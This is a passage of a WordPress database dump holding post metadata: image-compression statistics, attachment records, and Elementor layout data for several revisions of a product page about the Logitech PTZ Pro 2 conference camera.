93776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:13.8100000000000004973799150320701301097869873046875;s:5:\"bytes\";i:1319;s:11:\"size_before\";i:9554;s:10:\"size_after\";i:8235;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:15.1500000000000003552713678800500929355621337890625;s:5:\"bytes\";i:2154;s:11:\"size_before\";i:14221;s:10:\"size_after\";i:12067;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}}}'),(5624,2958,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:9.42952729789750065947373514063656330108642578125;s:5:\"bytes\";i:6539;s:11:\"size_before\";i:69346;s:10:\"size_after\";i:62807;s:4:\"time\";d:0.08000000000000000166533453693773481063544750213623046875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:6:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.45999999999999996447286321199499070644378662109375;s:5:\"bytes\";i:302;s:11:\"size_before\";i:4675;s:10:\"size_after\";i:4373;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:8.5600000000000004973799150320701301097869873046875;s:5:\"bytes\";i:494;s:11:\"size_before\";i:5774;s:10:\"size_after\";i:5280;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:10.699999999999999289457264239899814128875732421875;s:5:\"bytes\";i:2319;s:11:\"size_before\";i:21665;s:10:\"size_after\";i:19346;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:8.3300000000000000710542735760100185871124267578125;s:5:\"bytes\";i:471;s:11:\"size_before\";i:5651;s:10:\"size_after\";i:5180;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:9.050000000000000710542735760100185871124267578125;s:5:\"bytes\";i:1130;s:11:\"size_before\";i:12487;s:10:\"size_after\";i:11357;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:9.550000000000000710542735760100185871124267578125;s:5:\"bytes\";i:1823;s:11:\"size_before\";i:19094;s:10:\"size_after\";i:17271;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}}}'),(5626,2959,'_wp_page_template','template-fullwidth.php'),(5627,2959,'_elementor_edit_mode','builder'),(5628,2959,'_elementor_template_type','post'),(5629,2959,'_elementor_data','[{\"id\":\"f1634bc\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"6d9502b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"df1156a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>PTZ PRO 2<\\/p><p>HD 1080p video camera with enhanced pan\\/tilt and zoom<\\/p><ul><li>See every detail with HD video and 10x zoom<\\/li><li>Works with your meeting and video conferencing applications<\\/li><li>Use with your existing audio system or speakerphone<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"7a1160a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"2991200\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ptz-pro-2-camera.png\",\"id\":1321},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11de723\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"78e614d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"b75d15b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>A LEAP FORWARD IN OPTICS AND PERFORMANCE<\\/h2><p>Logitech PTZ Pro 2 delivers premium optics and life-like video to create the experience of sitting together in the same room, even if you are a thousand kilometers away. Technical improvements accent the camera\\u2019s brilliantly sharp image resolution, outstanding colour reproduction, and exceptional optical accuracy. At half the price of comparable models, PTZ Pro 2 is clearly the smart choice.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"065d405\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"2b2d1c3\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"370fba3\",\"elType\":\"widget\",\"settings\":{\"title\":\"KEY FEATURES\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"eca227c\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"e3e4388\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"f238ff8\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/youtu.be\\/JEoMD9m4K1k\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"eda75f7\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"0615e1b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>CAPTURE THE ACTION IN HIGH-DEF<\\/h3><p><span style=\\\"font-size: 0.875rem;\\\">PTZ Pro 2 is the perfect fit for classrooms, auditoriums, and large meeting rooms. Capture a wide shot with a 90\\u00b0 field of view, or focus on presenters, panelists, and whiteboards with flexible pan and tilt controls. A 10x zoom lens with autofocus perfectly frames speakers and their visual aids, and delivers outstanding detail and clarity to remote participants and recording systems.<\\/span><\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"56c207e\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"c531900\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"2682dd7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>EASY TO SET UP AND USE<\\/h3><p>USB plug-and-play connectivity makes PTZ Pro 2 a breeze to deploy and use. Simply connect PTZ Pro 2 to the conference room computer or your laptop through USB, and you\\u2019re good to go. Designed for compatibility with video conferencing applications on Windows\\u00ae and Mac\\u00ae computers, PTZ Pro 2 complements any audio system or speakerphone.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"61cfa0a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"af7a3b3\",\"elType\":\"widget\",\"settings\":{\"wp_gallery\":[{\"id\":2957,\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/ptz-pro-2-camera-1.jpg\"},{\"id\":2958,\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/ptz-pro-2-camera.jpg\"}],\"thumbnail_size\":\"medium\",\"gallery_columns\":\"2\"},\"elements\":[],\"widgetType\":\"image-gallery\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7218c5e\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"3f95752\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"bdddfd4\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(5631,2954,'_elementor_version','0.4'),(5637,2960,'_elementor_version','0.4'),(5641,2962,'_wp_attached_file','2019/03/ptz-pro-2-camera-2.jpg'),(5642,2962,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:930;s:6:\"height\";i:523;s:4:\"file\";s:30:\"2019/03/ptz-pro-2-camera-2.jpg\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"ptz-pro-2-camera-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"ptz-pro-2-camera-2-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:30:\"ptz-pro-2-camera-2-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:30:\"ptz-pro-2-camera-2-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:30:\"ptz-pro-2-camera-2-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:30:\"ptz-pro-2-camera-2-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:28:\"ptz-pro-2-camera-2-20x11.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:11;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(5643,2961,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:14.2215048930475820299079714459367096424102783203125;s:5:\"bytes\";i:6961;s:11:\"size_before\";i:48947;s:10:\"size_after\";i:41986;s:4:\"time\";d:0.060000000000000004718447854656915296800434589385986328125;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:6:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:8.6699999999999999289457264239899814128875732421875;s:5:\"bytes\";i:266;s:11:\"size_before\";i:3069;s:10:\"size_after\";i:2803;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:13.7599999999999997868371792719699442386627197265625;s:5:\"bytes\";i:553;s:11:\"size_before\";i:4019;s:10:\"size_after\";i:3466;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:15.910000000000000142108547152020037174224853515625;s:5:\"bytes\";i:2489;s:11:\"size_before\";i:15640;s:10:\"size_after\";i:13151;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:13.3100000000000004973799150320701301097869873046875;s:5:\"bytes\";i:500;s:11:\"size_before\";i:3757;s:10:\"size_after\";i:3257;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:13.3800000000000007815970093361102044582366943359375;s:5:\"bytes\";i:1178;s:11:\"size_before\";i:8804;s:10:\"size_after\";i:7626;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:14.46000000000000085265128291212022304534912109375;s:5:\"bytes\";i:1975;s:11:\"size_before\";i:13658;s:10:\"size_after\";i:11683;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}}}'),(5644,2962,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:9.62164013011470586889117839746177196502685546875;s:5:\"bytes\";i:6182;s:11:\"size_before\";i:64251;s:10:\"size_after\";i:58069;s:4:\"time\";d:0.070000000000000006661338147750939242541790008544921875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:6:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.79999999999999982236431605997495353221893310546875;s:5:\"bytes\";i:260;s:11:\"size_before\";i:3822;s:10:\"size_after\";i:3562;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:8.089999999999999857891452847979962825775146484375;s:5:\"bytes\";i:458;s:11:\"size_before\";i:5661;s:10:\"size_after\";i:5203;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:10.57000000000000028421709430404007434844970703125;s:5:\"bytes\";i:2177;s:11:\"size_before\";i:20587;s:10:\"size_after\";i:18410;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:8.199999999999999289457264239899814128875732421875;s:5:\"bytes\";i:444;s:11:\"size_before\";i:5414;s:10:\"size_after\";i:4970;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:9.0999999999999996447286321199499070644378662109375;s:5:\"bytes\";i:1046;s:11:\"size_before\";i:11495;s:10:\"size_after\";i:10449;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:10.4000000000000003552713678800500929355621337890625;s:5:\"bytes\";i:1797;s:11:\"size_before\";i:17272;s:10:\"size_after\";i:15475;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}}}'),(5645,2963,'_wp_page_template','template-fullwidth.php'),(5646,2963,'_elementor_edit_mode','builder'),(5647,2963,'_elementor_template_type','post'),(5648,2963,'_elementor_data','[{\"id\":\"f1634bc\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"6d9502b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"df1156a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>PTZ PRO 2<\\/p><p>HD 1080p video camera with enhanced pan\\/tilt and zoom<\\/p><ul><li>See every detail with HD video and 10x zoom<\\/li><li>Works with your meeting and video conferencing applications<\\/li><li>Use with your existing audio system or speakerphone<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"7a1160a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"2991200\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ptz-pro-2-camera.png\",\"id\":1321},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11de723\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"78e614d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"b75d15b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>A LEAP FORWARD IN OPTICS AND PERFORMANCE<\\/h2><p>Logitech PTZ Pro 2 delivers premium optics and life-like video to create the experience of sitting together in the same room, even if you are a thousand kilometers away. Technical improvements accent the camera\\u2019s brilliantly sharp image resolution, outstanding colour reproduction, and exceptional optical accuracy. At half the price of comparable models, PTZ Pro 2 is clearly the smart choice.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"065d405\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"2b2d1c3\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"370fba3\",\"elType\":\"widget\",\"settings\":{\"title\":\"KEY FEATURES\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"eca227c\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"e3e4388\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"f238ff8\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/youtu.be\\/JEoMD9m4K1k\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"eda75f7\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"0615e1b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>CAPTURE THE ACTION IN HIGH-DEF<\\/h3><p><span style=\\\"font-size: 0.875rem;\\\">PTZ Pro 2 is the perfect fit for classrooms, auditoriums, and large meeting rooms. Capture a wide shot with a 90\\u00b0 field of view, or focus on presenters, panelists, and whiteboards with flexible pan and tilt controls. A 10x zoom lens with autofocus perfectly frames speakers and their visual aids, and delivers outstanding detail and clarity to remote participants and recording systems.<\\/span><\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"56c207e\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"c531900\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"2682dd7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>EASY TO SET UP AND USE<\\/h3><p>USB plug-and-play connectivity makes PTZ Pro 2 a breeze to deploy and use. Simply connect PTZ Pro 2 to the conference room computer or your laptop through USB, and you\\u2019re good to go. Designed for compatibility with video conferencing applications on Windows\\u00ae and Mac\\u00ae computers, PTZ Pro 2 complements any audio system or speakerphone.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"61cfa0a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"af7a3b3\",\"elType\":\"widget\",\"settings\":{\"wp_gallery\":[{\"id\":2957,\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/ptz-pro-2-camera-1.jpg\"},{\"id\":2958,\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/ptz-pro-2-camera.jpg\"}],\"thumbnail_size\":\"medium\",\"gallery_columns\":\"2\"},\"elements\":[],\"widgetType\":\"image-gallery\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7218c5e\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"3f95752\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"a3ffca9\",\"elType\":\"widget\",\"settings\":{\"wp_gallery\":[{\"id\":2961,\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/ptz-pro-2-camera-3.jpg\"},{\"id\":2962,\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/ptz-pro-2-camera-2.jpg\"}],\"thumbnail_size\":\"medium\",\"gallery_columns\":\"2\"},\"elements\":[],\"widgetType\":\"image-gallery\"}],\"isInner\":false},{\"id\":\"bdddfd4\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"94d099e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>OPERATE NEARBY OR FAR AWAY<\\/h3><p>Pan, tilt, and zoom with the hand-held remote to see everything in your conference room, auditorium, classroom, or workspace. The camera can also be operated from a remote location with downloadable software.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d11c4d2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e7bfa7e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"a37df32\",\"elType\":\"widget\",\"settings\":{\"title\":\"ADDITIONAL FEATURES\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"77cdf52\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"ca27297\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"26cf59c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>PREMIUM CAMERA LENS<\\/h4><p>PTZ Pro 2 features a premium camera lens, designed and manufactured by Logitech. Enjoy bright, clear video with accurate color rendition and sharpness, even when zoomed in.<\\/p>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"7587d63\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"b12d91c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>MULTIPLE MOUNTING OPTIONS<\\/h4><p>Configure the conference rooms or event space any way you want: PTZ Pro 2 includes mounting hardware for both tabletop and wall mounting, and features a standard tripod thread for additional flexibility.<\\/p>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5363edd\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"41471da\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>PRESET AND FORGET<\\/h4><p>Compose a wide shot so that everyone is in view. Smoothly switch between people and whiteboards. Perfectly frame each panelist for a broadcast-like experience. PTZ Pro 2 features three camera presets that save pan, tilt, and zoom settings, and smoothly transitions between them at the touch of a button.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b674c12\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"e7fd0e2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>CERTIFIED FOR BUSINESS<\\/h4><p>PTZ Pro 2 offers a plug-and-play USB connection to conference room computers. The camera is certified for Skype for Business, is Cisco WebEx compatible, and offers enhanced integration with BlueJeans, Broadsoft, LifeSize Cloud, Vidyo, and Zoom. If your preferred application can recognize a webcam, you can use it with PTZ Pro 2.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(5649,2963,'_elementor_version','0.4'),(5666,2965,'_elementor_version','0.4'),(5664,2965,'_elementor_template_type','post'),(5665,2965,'_elementor_data','[{\"id\":\"f1634bc\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"6d9502b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"df1156a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>PTZ PRO 2<\\/h2><p>HD 1080p video camera with enhanced pan\\/tilt and zoom<\\/p><ul><li>See every detail with HD video and 10x zoom<\\/li><li>Works with your meeting and video conferencing applications<\\/li><li>Use with your existing audio system or speakerphone<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"7a1160a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"2991200\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ptz-pro-2-camera.png\",\"id\":1321},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11de723\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"78e614d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"b75d15b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>A LEAP FORWARD IN OPTICS AND PERFORMANCE<\\/h2><p>Logitech PTZ Pro 2 delivers premium optics and life-like video to create the experience of sitting together in the same room, even if you are a thousand kilometers away. Technical improvements accent the camera\\u2019s brilliantly sharp image resolution, outstanding colour reproduction, and exceptional optical accuracy. At half the price of comparable models, PTZ Pro 2 is clearly the smart choice.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"065d405\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"2b2d1c3\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"370fba3\",\"elType\":\"widget\",\"settings\":{\"title\":\"KEY FEATURES\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"eca227c\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"e3e4388\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"f238ff8\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/youtu.be\\/JEoMD9m4K1k\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"eda75f7\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"0615e1b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>CAPTURE THE ACTION IN HIGH-DEF<\\/h3><p><span style=\\\"font-size: 0.875rem;\\\">PTZ Pro 2 is the perfect fit for classrooms, auditoriums, and large meeting rooms. Capture a wide shot with a 90\\u00b0 field of view, or focus on presenters, panelists, and whiteboards with flexible pan and tilt controls. A 10x zoom lens with autofocus perfectly frames speakers and their visual aids, and delivers outstanding detail and clarity to remote participants and recording systems.<\\/span><\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"56c207e\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"c531900\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"2682dd7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>EASY TO SET UP AND USE<\\/h3><p>USB plug-and-play connectivity makes PTZ Pro 2 a breeze to deploy and use. Simply connect PTZ Pro 2 to the conference room computer or your laptop through USB, and you\\u2019re good to go. Designed for compatibility with video conferencing applications on Windows\\u00ae and Mac\\u00ae computers, PTZ Pro 2 complements any audio system or speakerphone.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"61cfa0a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"af7a3b3\",\"elType\":\"widget\",\"settings\":{\"wp_gallery\":[{\"id\":2957,\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/ptz-pro-2-camera-1.jpg\"},{\"id\":2958,\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/ptz-pro-2-camera.jpg\"}],\"thumbnail_size\":\"medium\",\"gallery_columns\":\"2\"},\"elements\":[],\"widgetType\":\"image-gallery\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7218c5e\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"3f95752\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"a3ffca9\",\"elType\":\"widget\",\"settings\":{\"wp_gallery\":[{\"id\":2961,\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/ptz-pro-2-camera-3.jpg\"},{\"id\"